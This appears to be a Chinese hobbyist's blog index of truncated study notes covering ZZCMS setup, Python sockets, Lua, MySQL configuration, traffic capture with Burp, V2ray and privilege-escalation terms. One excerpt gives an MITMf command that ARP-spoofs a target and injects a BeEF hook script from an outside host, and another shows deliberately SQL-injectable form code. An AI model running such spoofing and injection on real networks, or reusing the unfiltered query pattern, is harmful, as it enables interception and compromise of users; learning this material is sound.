ZSSのW啥都学

总结 下载 下载地址http://www.zzcms.net/about/6.htm下载出来后安装解压出来叫网站的目录设置到解压出来的目录点击这个 数据库名什么都可以这个我就写成了ZZCMS查看数据库有没有配置成功可以看到已经搭建好了

实验环境搭建接收端和发送 我在虚拟机win7启动一个网络调试工具这个我已经启动了 创建套接字代码 12345678910#导入库import socket #创建套接字s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) #关闭套接字s.close() 代码说明 导入socket 1import socket Python 中，我们用 socket() 函数来创建套接字，语法格式如下 1s=socket.socket(socket. AF_INET,SOCK_STREAM或者SOCK_DGRAM) 解释第一个: socket. AF_INET是IPv4的意思第二个: SOCK_STREAM和SOCK_DGRAM，如果填写SOCK_STREAM是tcp的意思，SOCK_DGRAM是udp的意思 关闭socket 1s.close() ​ 向目标发送信息 发送端代码 1234567891011#导入库import socket #创ipv4,和UDP类型的建套接字s=socket.socket(s ...

笔记 输出输出print("Hello") 1.ifLua认为false和nil为假，true和非nil为真。和其他语言有点不同为真才会执行then里面的，如果是假会跳过then里面的 1234if (真)then print("会执行这个")end true咧 代码 12345#!/usr/bin/luaif truethen print("Hello")end 执行结果 false咧 代码 123456#!/usr/bin/luaif falsethen print("Hello")end print("Hello1111") 结果 实咧 代码 1234567#!/usr/bin/luaa="abc"if (a=="abc")then print("a变量是abc&qu ...

下面是我写的一个表单查询数据库用的代码没有进入过滤是存在sql注入漏洞的 a.html文件 12345678910111213<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>登陆</title></head><body> <form action="a.php" method="GET"> <input type="text" name="id"><br/> <input type="submit" value="点击"/></form></body></html> a.php文 ...

笔记 MITMf的github下载地址https://github.com/byt3bl33d3r/MITMf启动beef-xss mitmf命令1mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.10 --inject --js-url http://1.1.1.1:3000/hook.js 上面的命令的意思–spoof是用来作欺骗， –arp 意思是使用arp欺骗 -i 指定设备 –gateway指定的是网关地址 –target欺骗的目标 –inject 是进行注入，注入的是–js-url 脚本用的是beef-xss

开学了学习时间少非常了，虽然是职高但不是计算机专业 sql注入打基础，之前都学习的sql注入原理，没有学习sql语句感觉有点迷糊，就直接拿别人的语句自己进行找网站漏洞，或者用sqlmp直接去扫，感觉很麻木不知道他是怎么交互的 学习笔记，英语不好，容易忘，写下笔记 问题解决连接报错ERROR 1045 (28000): Access denied for user ‘root’@’::1’ (using password: YES)在windows系统的数据库文件里面配置 my.ini文件添加内容 123[mysqld]# 其他已存在的配置项...skip-grant-tables 数据库启动日志1234567[mysqld]# 其他已存在的配置项...# 启用查询日志log-output=FILEgeneral-log=1general-log-file="C:/phpstudy_pro/Extensions/MySQL5.7.26/data/query.log" 在 PowerShell 中，你可以使用 Get-Content 命令来实时监控文件。下面是 ...

为什么我要总结 应为就是编程语言学习的多了容易搞混，比如c语言的数组和python的列字典等搞混 还有我英语真的是小学等级的很多函数方法属性记不住我就写到这个了 总结方法/函数修改字符串 方法/函数 作用 title()方法 这个方法可以叫字符串首字母修改成大写 rstrip()方法 方法会移出尾的空格 strip()方法 方法会移出头和尾的空格 upper()方法 把所有字符中的小写字母转换成大写字母 lower()方法 把所有字符中的大写字母转换成小写字母 capitalize()方法 把第一个字母转化为大写字母，其余小写 title()方法 把每个单词的第一个字母转化为大写，其余小写 增加元素 方法/函数 作用 append()方法 这个方法会在列表最后增加元素 insert()方法 这个方法可以在选择在那个地址增加元素 删除元素 方法/函数 作用 del语句 指定删除如何变量或元素字典 pop()方法 删除指定的元素,如果不指定默认删除最后一个,他返回被删除的值 remove()方法 指定元素内容删除 ...

我用了很多方法进行抓取微信小程序里面的数据网上也有很多文章抓取小程序，都是都不靠谱，可能是我操作有问题吧还是那是小程序安全？，我就不研究了通过抓包还是能抓取到内容的url都是可以获取到的，叫内容直接下载到本地 我用burp进行抓包 官方下载地址https://portswigger.net/burp burp这个工具我之前学习过将近2个月差不多，学习还算容易写笔记难 安装ca证书 可是他进去小程序显示网络不能用，这样不知道是什么原因，可能是有什么安全机制吗 访问https正常 charles 官方下载地址https://www.charlesproxy.com/latest-release/download.do 结果还是一样 手机版的抓包软件AndroidHttpCapture 进行抓包效果 还是一样 其他方法1.还用了叫https请求强制成http请求 这个方法还是不行2.抓包分析这个有个缺点就是都是加密的，但是有的是不加密的 我就是难受理论应该我可以行得通的都是实现是很难吗我又用了很多方法，比如叫用Wireshark进行抓包是可以抓的到的分析了很长时间，在电脑上打开小 ...

在国内有的网络技术文档都已经很老了，在外国能查看到新的互联网技术进行学习废话不多说 下载V2ray客户端 应为github下载的比较慢，我下载好的放到了蓝奏云里面，蓝奏云下载的快 https://wwa.lanzous.com/iIatmf0cmqf 更多其他系统版本 https://github.com/Qv2ray/Qv2ray/releases/tag/v1.99.6 下载核心 应为github下载的比较慢，我下载好的放到了蓝奏云里面，蓝奏云下载的快 https://wwa.lanzous.com/ixPOUf0cpyb 更多其他系统版本 https://github.com/v2fly/v2ray-core/releases/ 配置我创建了一个v2ray文件夹里面是解压好的下载的核心和V2ray客户端 然后在终端输入运行 给他执行权限 1chmod +x ./Qv2ray.v2.6.2.linux-x64.AppImage 运行 1./Qv2ray.v2.6.2.linux-x64.AppImage 设置 设置中文 他默认是英文的 ...

水平越权垂直越权未授权访问 垂直越权：就是从普通用户提权到管理员用户在提升到超级管理员等往上提权 比如：更换某一个id之类的身份标识从而获得（修改，删除等）其他用户的数据 水平越权：就是同级别的权限提升，比如普通用户a，提权到普通用户b这就是水平越权 未授权访问：就是没有权限就可以访问